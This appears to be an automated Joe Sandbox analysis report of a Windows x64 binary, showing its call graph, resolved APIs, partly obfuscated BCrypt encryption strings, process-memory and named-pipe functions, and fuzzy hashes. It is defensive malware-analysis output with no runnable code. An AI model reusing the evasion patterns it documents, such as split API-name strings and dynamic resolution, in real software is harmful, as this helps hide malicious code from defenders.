3334 7ff73cfc18ec LocalFree 3332->3334 3333->3330 3333->3331 3334->3333 3336 7ff73cfc1056 3335->3336 3337 7ff73cfc1074 3336->3337 3338 7ff73cfc110c GetModuleHandleW GetProcAddress 3336->3338 3339 7ff73cfc10b1 3336->3339 3346 7ff73cfc10b7 3336->3346 3341 7ff73cfc1078 3337->3341 3342 7ff73cfc10cb GetModuleHandleW GetProcAddress 3337->3342 3343 7ff73cfc10a4 3338->3343 3340 7ff73cfc1143 LocalFree 3339->3340 3339->3346 3340->3346 3341->3340 3344 7ff73cfc1085 GetModuleHandleW GetProcAddress 3341->3344 3345 7ff73cfc10ea 3342->3345 3343->3339 3344->3343 3345->3340 3407 7ff73cfc1534 GetModuleHandleW GetProcAddress 3345->3407 3346->3297 3349 7ff73cfc1e78 3348->3349 3350 7ff73cfc19d7 3348->3350 3351 7ff73cfc214c 14 API calls 3349->3351 3352 7ff73cfc19df 3350->3352 3353 7ff73cfc1bd8 3350->3353 3365 7ff73cfc1e87 3351->3365 3355 7ff73cfc19e7 3352->3355 3364 7ff73cfc1b3a 3352->3364 3416 7ff73cfc214c 3353->3416 3358 7ff73cfc19eb 3355->3358 3359 7ff73cfc1864 6 API calls 3355->3359 3356 7ff73cfc1bf1 3356->3358 3360 7ff73cfc1170 11 API calls 3356->3360 3357 7ff73cfc1ede 3357->3358 3361 7ff73cfc214c 14 API calls 3357->3361 3358->3285 3390 7ff73cfc3da8 3358->3390 3366 7ff73cfc1a06 3359->3366 3380 7ff73cfc1c23 3360->3380 3362 7ff73cfc1f06 3361->3362 3362->3358 3372 7ff73cfc1f84 18 API calls 3362->3372 3363 7ff73cfc1f84 18 API calls 3363->3365 3364->3358 3369 7ff73cfc1b9f RtlInitUnicodeString 3364->3369 3365->3357 3365->3363 3366->3358 3368 7ff73cfc1a92 GetModuleHandleW GetProcAddress 3366->3368 3373 7ff73cfc1aea RtlInitUnicodeString 3366->3373 3367 7ff73cfc1d27 3367->3358 3371 7ff73cfc214c 14 API calls 3367->3371 3378 7ff73cfc1abe 3368->3378 3374 7ff73cfc1f84 18 API calls 3369->3374 3370 7ff73cfc1170 11 API calls 3370->3380 3375 7ff73cfc1d45 3371->3375 3372->3362 3379 7ff73cfc1b0f LocalFree 3373->3379 3374->3364 3375->3358 3377 7ff73cfc1170 11 API calls 3375->3377 3376 7ff73cfc1c78 GetModuleHandleW GetProcAddress 3376->3380 3384 7ff73cfc1d79 3377->3384 3378->3366 3379->3366 3380->3358 
3380->3367 3380->3370 3380->3376 3381 7ff73cfc1d0b LocalFree 3380->3381 3425 7ff73cfc1f84 3380->3425 3381->3380 3383 7ff73cfc1170 11 API calls 3383->3384 3384->3358 3384->3383 3385 7ff73cfc1dc8 GetModuleHandleW GetProcAddress 3384->3385 3389 7ff73cfc1e11 3385->3389 3386 7ff73cfc1170 11 API calls 3386->3389 3387 7ff73cfc1e58 LocalFree 3387->3384 3388 7ff73cfc1f84 18 API calls 3388->3389 3389->3384 3389->3386 3389->3387 3389->3388 3391 7ff73cfc3e02 3390->3391 3397 7ff73cfc3ec5 3390->3397 3391->3397 3440 7ff73cfc1380 3391->3440 3393 7ff73cfc3e3d 3394 7ff73cfc1170 11 API calls 3393->3394 3393->3397 3395 7ff73cfc3e7a 3394->3395 3396 7ff73cfc1170 11 API calls 3395->3396 3395->3397 3396->3397 3397->3285 3399 7ff73cfc194f 3398->3399 3399->3284 3402 7ff73cfc2d0c 3400->3402 3401 7ff73cfc2e6c 3401->3327 3402->3401 3403 7ff73cfc2d80 GetModuleHandleW GetProcAddress 3402->3403 3404 7ff73cfc2dac 3403->3404 3404->3401 3405 7ff73cfc2e39 GetModuleHandleW GetProcAddress 3404->3405 3406 7ff73cfc2e65 3405->3406 3406->3401 3408 7ff73cfc1570 3407->3408 3409 7ff73cfc157c CreateFileMappingW 3408->3409 3415 7ff73cfc15e8 3408->3415 3410 7ff73cfc15a8 MapViewOfFile 3409->3410 3411 7ff73cfc15ce 3409->3411 3410->3411 3412 7ff73cfc1601 3411->3412 3413 7ff73cfc15fb UnmapViewOfFile 3411->3413 3411->3415 3414 7ff73cfc1609 CloseHandle 3412->3414 3412->3415 3413->3412 3414->3415 3415->3343 3417 7ff73cfc2181 GetCurrentProcess 3416->3417 3418 7ff73cfc2178 3416->3418 3417->3418 3419 7ff73cfc21cd 3418->3419 3420 7ff73cfc21d1 NtQueryInformationProcess 3418->3420 3421 7ff73cfc2231 RtlGetCurrentPeb 3418->3421 3419->3420 3424 7ff73cfc220c __initmbctable 3419->3424 3422 7ff73cfc21ea 3420->3422 3420->3424 3421->3424 3423 7ff73cfc1170 11 API calls 3422->3423 3422->3424 3423->3424 3424->3356 3426 7ff73cfc1170 11 API calls 3425->3426 3427 7ff73cfc1fdb 3426->3427 3428 7ff73cfc20d1 3427->3428 3429 7ff73cfc1ff2 GetModuleHandleW GetProcAddress 3427->3429 3428->3380 3430 7ff73cfc2024 3429->3430 3430->3428 3431 
7ff73cfc1170 11 API calls 3430->3431 3432 7ff73cfc2041 GetModuleHandleW GetProcAddress 3431->3432 3433 7ff73cfc207f 3432->3433 3435 7ff73cfc1170 11 API calls 3433->3435 3439 7ff73cfc209e LocalFree 3433->3439 3437 7ff73cfc2098 3435->3437 3436 7ff73cfc20c0 LocalFree 3436->3428 3438 7ff73cfc20a4 LocalFree 3437->3438 3437->3439 3438->3439 3439->3428 3439->3436 3441 7ff73cfc13dc 3440->3441 3446 7ff73cfc13fb 3440->3446 3442 7ff73cfc145e GetModuleHandleW GetProcAddress LocalAlloc 3441->3442 3444 7ff73cfc13f2 3441->3444 3441->3446 3448 7ff73cfc141f 3441->3448 3443 7ff73cfc1493 3442->3443 3442->3446 3445 7ff73cfc1170 11 API calls 3443->3445 3444->3442 3444->3446 3447 7ff73cfc14a3 3445->3447 3446->3393 3449 7ff73cfc1380 11 API calls 3447->3449 3452 7ff73cfc14bb LocalFree 3447->3452 3448->3446 3451 7ff73cfc1380 11 API calls 3448->3451 3449->3452 3451->3446 3452->3446 3454 7ff73cfc8c24 3453->3454 3455 7ff73cfc5e6e 3454->3455 3456 7ff73cfc5798 _errno 62 API calls 3454->3456 3455->3020 3455->3022 3457 7ff73cfc8c49 3456->3457 3458 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 3457->3458 3458->3455 3463 7ff73cfc8ad4 3459->3463 3460 7ff73cfc8ad9 3461 7ff73cfc5798 _errno 62 API calls 3460->3461 3462 7ff73cfc5d30 3460->3462 3464 7ff73cfc8b03 3461->3464 3462->3044 3462->3059 3463->3460 3463->3462 3466 7ff73cfc8b17 3463->3466 3465 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 3464->3465 3465->3462 3466->3462 3467 7ff73cfc5798 _errno 62 API calls 3466->3467 3467->3464 3469 7ff73cfc8a57 3468->3469 3471 7ff73cfc8a4d 3468->3471 3470 7ff73cfc5798 _errno 62 API calls 3469->3470 3476 7ff73cfc8a60 3470->3476 3471->3469 3473 7ff73cfc8a8e 3471->3473 3472 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 3474 7ff73cfc5d5b 3472->3474 3473->3474 3475 7ff73cfc5798 _errno 62 API calls 3473->3475 3474->3051 3474->3054 3475->3476 3476->3472 3495 7ff73cfc5114 EncodePointer 3477->3495 3497 7ff73cfc5847 ExitProcess 3496->3497 3498 7ff73cfc582e GetProcAddress 3496->3498 3498->3497 3499 
7ff73cfc5843 3498->3499 3499->3497 3501 7ff73cfc741c _lock 56 API calls 3500->3501 3502 7ff73cfc5a12 3501->3502 3504 7ff73cfc5a39 DecodePointer 3502->3504 3507 7ff73cfc5afa _amsg_exit 3502->3507 3503 7ff73cfc5b30 3510 7ff73cfc5b5b 3503->3510 3518 7ff73cfc731c LeaveCriticalSection 3503->3518 3504->3507 3508 7ff73cfc5a57 DecodePointer 3504->3508 3507->3503 3521 7ff73cfc731c LeaveCriticalSection 3507->3521 3516 7ff73cfc5a7c 3508->3516 3509 7ff73cfc5b49 3511 7ff73cfc5814 _amsg_exit GetModuleHandleW GetProcAddress 3509->3511 3513 7ff73cfc5b51 ExitProcess 3511->3513 3514 7ff73cfc5a9b DecodePointer 3520 7ff73cfc5114 EncodePointer 3514->3520 3516->3507 3516->3514 3517 7ff73cfc5ab1 DecodePointer DecodePointer 3516->3517 3519 7ff73cfc5114 EncodePointer 3516->3519 3517->3516 4104 7ff73cfc57b8 4105 7ff73cfc57f1 4104->4105 4106 7ff73cfc57c7 4104->4106 4106->4105 4108 7ff73cfc82d8 4106->4108 4109 7ff73cfc5284 _getptd 62 API calls 4108->4109 4110 7ff73cfc82e1 4109->4110 4113 7ff73cfc90cc 4110->4113 4120 7ff73cfc833c DecodePointer 4113->4120 4121 7ff73cfc453c 4124 7ff73cfc6a58 4121->4124 4125 7ff73cfc6a8a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4124->4125 4126 7ff73cfc4545 4124->4126 4125->4126 4127 7ff73cfc57fc SetUnhandledExceptionFilter 4128 7ff73cfc2f10 4129 7ff73cfc2f70 4128->4129 4130 7ff73cfc1380 15 API calls 4129->4130 4139 7ff73cfc3056 4129->4139 4131 7ff73cfc2fac 4130->4131 4132 7ff73cfc1170 11 API calls 4131->4132 4131->4139 4133 7ff73cfc2fdb 4132->4133 4134 7ff73cfc1170 11 API calls 4133->4134 4133->4139 4135 7ff73cfc300e 4134->4135 4135->4139 4140 7ff73cfc3074 4135->4140 4138 7ff73cfc3074 17 API calls 4138->4139 4141 7ff73cfc30b1 GetModuleHandleW GetProcAddress 4140->4141 4143 7ff73cfc30fc 4141->4143 4144 7ff73cfc3032 4143->4144 4145 7ff73cfc1170 11 API calls 4143->4145 4144->4138 4144->4139 4146 7ff73cfc3122 4145->4146 4147 7ff73cfc3246 LocalFree 4146->4147 4148 7ff73cfc1170 11 API calls 4146->4148 
4147->4144 4149 7ff73cfc314b 4148->4149 4149->4147 4150 7ff73cfc1170 11 API calls 4149->4150 4151 7ff73cfc316d 4150->4151 4151->4147 4152 7ff73cfc1170 11 API calls 4151->4152 4153 7ff73cfc319c 4152->4153 4153->4147 4154 7ff73cfc31b3 GetModuleHandleW GetProcAddress 4153->4154 4155 7ff73cfc31e1 4154->4155 4155->4147 4156 7ff73cfc1170 11 API calls 4155->4156 4158 7ff73cfc3207 LocalFree 4156->4158 4158->4147 4159 7ff73cfc2c54 4160 7ff73cfc2ce0 4159->4160 4163 7ff73cfc2c64 4159->4163 4161 7ff73cfc2cda FreeLibrary 4161->4160 4162 7ff73cfc2c93 LocalFree 4164 7ff73cfc2cac LocalFree 4162->4164 4163->4161 4163->4162 4164->4161 4166 7ff73cfc41d4 4167 7ff73cfc4130 __initmbctable 62 API calls 4166->4167 4168 7ff73cfc41fa 4167->4168 4169 7ff73cfc4201 4168->4169 4174 7ff73cfc4233 4168->4174 4170 7ff73cfc5798 _errno 62 API calls 4169->4170 4171 7ff73cfc4206 4170->4171 4172 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 4171->4172 4175 7ff73cfc4211 4172->4175 4173 7ff73cfc5460 64 API calls 4173->4174 4174->4173 4174->4175 4176 7ff73cfc85cc 4177 7ff73cfc7520 __onexitinit 62 API calls 4176->4177 4178 7ff73cfc85df EncodePointer 4177->4178 4179 7ff73cfc85fe 4178->4179 4180 7ff73cfc918e 4183 7ff73cfc731c LeaveCriticalSection 4180->4183

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3225137318-3502785670
                                                                      • Opcode ID: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                                                      • Instruction ID: 642c1ce69bf535c4ed5d2c289370d00c663158fc13c76701510719361067d5f6
                                                                      • Opcode Fuzzy Hash: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                                                      • Instruction Fuzzy Hash: 0B11BF73B18A5392EB04AB25E844669A2E1FB88BC0F88D531DE8D83764DE3DE855C310

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcess$InformationQuery
                                                                      • String ID:
                                                                      • API String ID: 4257070689-0
                                                                      • Opcode ID: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                                                      • Instruction ID: c4b0b3250ecf29fa021463758f52b7787629e1f85056e6fdef458fab04fd036d
                                                                      • Opcode Fuzzy Hash: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                                                      • Instruction Fuzzy Hash: CE31AE37B04B53AAEB249F51A840AAD73A4FB04B98F818435DE8D13764DF38E85AD350

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                                      • String ID: BCryenAlthmPder$BCrynerammeteyBCryenAlthmPder$BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGetProperty$BCryptSetProperty$LoadLibraryW$c$der$gori$kernel32$rovi$t$thmP$y
                                                                      • API String ID: 384173800-2409299874
                                                                      • Opcode ID: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                                                      • Instruction ID: b26cd41a195b04f3a5d691c89cc596cbbd671d42bcd6b6c3267a5cb3bd6863fe
                                                                      • Opcode Fuzzy Hash: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                                                      • Instruction Fuzzy Hash: 7C51B477E49A03AAFB10EF60E848178B3F4FB44748F948539D98C96668DF3CA545A720

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FileMemoryPointerProcess$FreeLocalReadWrite
                                                                      • String ID: LocalAlloc$ReadFile$WriteFile$kernel32
                                                                      • API String ID: 1117553398-482538141
                                                                      • Opcode ID: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                                                      • Instruction ID: 5b81bfe6033a5d141ee013ae635d67b9cd1e072114eb9b659379601595639741
                                                                      • Opcode Fuzzy Hash: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                                                      • Instruction Fuzzy Hash: 90512A77B08A43A2EB10BF16E850579A3A1FB88BD4B94D531DA8E83B54CF3EE455D310

                                                                      Control-flow Graph

                                                                      • Graph image not reproduced. Function entry 7ff73cfc196c; basic blocks span 7ff73cfc196c-7ff73cfc1f83 (common exit block 7ff73cfc1f6e-7ff73cfc1f83).
                                                                      • Windows APIs called directly from the graph: RtlInitUnicodeString, GetModuleHandleW, GetProcAddress, LocalFree
                                                                      • Internal subroutines called: 7ff73cfc1170, 7ff73cfc1624, 7ff73cfc1864, 7ff73cfc1f84, 7ff73cfc214c, 7ff73cfc4104
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 979628613-3502785670
                                                                      • Opcode ID: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                                                      • Instruction ID: 7d77f187ad5e88883962f504635f8acc33324cf6101fd662e7f8a24b026550ad
                                                                      • Opcode Fuzzy Hash: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                                                      • Instruction Fuzzy Hash: D8025137B09B4796EB60EB15E4406AAB3E4FB84794F808531EA8D43B98EF3DE514D710

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
                                                                      • API String ID: 1646373207-1761306045
                                                                      • Opcode ID: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                                                      • Instruction ID: d4eaad26785371be0655d1bdaebfe88e7b9824cb45a7231b602812d7de3a5eb6
                                                                      • Opcode Fuzzy Hash: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                                                      • Instruction Fuzzy Hash: A4410637B08A43A2FB00AB15F848665A3E0FF84799FC05431C98C47668DF3DE54AE724

                                                                      Control-flow Graph

                                                                      • Graph image not reproduced. Function entry 7ff73cfc36d8; basic blocks span 7ff73cfc36d8-7ff73cfc3a7c.
                                                                      • Windows APIs called directly from the graph: GetModuleHandleW, GetProcAddress, LocalFree
                                                                      • Internal subroutines called: 7ff73cfc1170, 7ff73cfc224c (three consecutive calls), 7ff73cfc326c, 7ff73cfc3ae8
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLocalModuleProc$File$Pointer$CreateMemoryProcessWrite
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 2588141871-3502785670
                                                                      • Opcode ID: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                                                      • Instruction ID: 81b307a87e68c7207a41a6a020432c03b67ed1ddc2d715322ee6e31d9193f0db
                                                                      • Opcode Fuzzy Hash: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                                                      • Instruction Fuzzy Hash: 81B11B77B09A07AAEB50EB64E4802AC73F5FB48788F808535DA8D43758DE3CE519D760

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
                                                                      • String ID: GetLastError$kernel32
                                                                      • API String ID: 2144717574-498319287
                                                                      • Opcode ID: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                                                      • Instruction ID: 2d939a36748c36a7dc8dd35ce287404ed5328be4ec8d01d8b704ad2887a5ad4f
                                                                      • Opcode Fuzzy Hash: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                                                      • Instruction Fuzzy Hash: F0314333B0864392E750EF25E404769B3E0FB84BA4F948B34D6AD476A4DF7CE4499720

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FreeLocal$FilePointer$MemoryProcessWrite
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3806729184-3502785670
                                                                      • Opcode ID: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                                                      • Instruction ID: dee459a5ebd42db48f0cc0f75eed7299cb71da4074f5bb01a4b0bd3374f101b6
                                                                      • Opcode Fuzzy Hash: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                                                      • Instruction Fuzzy Hash: 7F411C37B45B07AAEB10EF60D4445A8B3B4FB44B88B848835CE4D43B59EF38E559D390

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
                                                                      • String ID:
                                                                      • API String ID: 2949660345-0
                                                                      • Opcode ID: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                                                      • Instruction ID: 66ec862500ea65597d1face5cd037cef20b3133c62304c94a135b9428817a094
                                                                      • Opcode Fuzzy Hash: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                                                      • Instruction Fuzzy Hash: 5B310C23F0C603A6FA54BBA094412B9E6D1AF90744FD0CC39DADE462D7DE2CB440B671

                                                                      Control-flow Graph

                                                                      • Graph image not reproduced. Function entry 7ff73cfc326c; basic blocks span 7ff73cfc326c-7ff73cfc35fe.
                                                                      • Windows APIs called directly from the graph: RtlInitUnicodeString, CreateFileW, OpenProcess, LocalFree, UnmapViewOfFile, CloseHandle
                                                                      • Internal subroutines called: 7ff73cfc1000, 7ff73cfc1624, 7ff73cfc1864, 7ff73cfc1920, 7ff73cfc196c, 7ff73cfc2a34, 7ff73cfc3da8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocal$CloseFileHandle$CreateInitOpenProcessStringUnicodeUnmapView
                                                                      • String ID:
                                                                      • API String ID: 3774628339-0
                                                                      • Opcode ID: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                                                      • Instruction ID: 387836d66d092c20d7324e0cf1ad1d69091f9ee99f91f009bceb75821f466356
                                                                      • Opcode Fuzzy Hash: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                                                      • Instruction Fuzzy Hash: 3CA13E37B08643AAF714AF11E8846B8B7E0FB44784F948935D98D43798DF3DE44AA720

                                                                      Control-flow Graph

                                                                      • Graph image not reproduced. Function entry 7ff73cfc66bc; basic blocks span 7ff73cfc66bc-7ff73cfc698d.
                                                                      • Windows APIs called directly from the graph: GetStartupInfoW, GetStdHandle, GetFileType, SetHandleCount, InitializeCriticalSectionAndSpinCount
                                                                      • Internal subroutines called: 7ff73cfc7520
                                                                      APIs
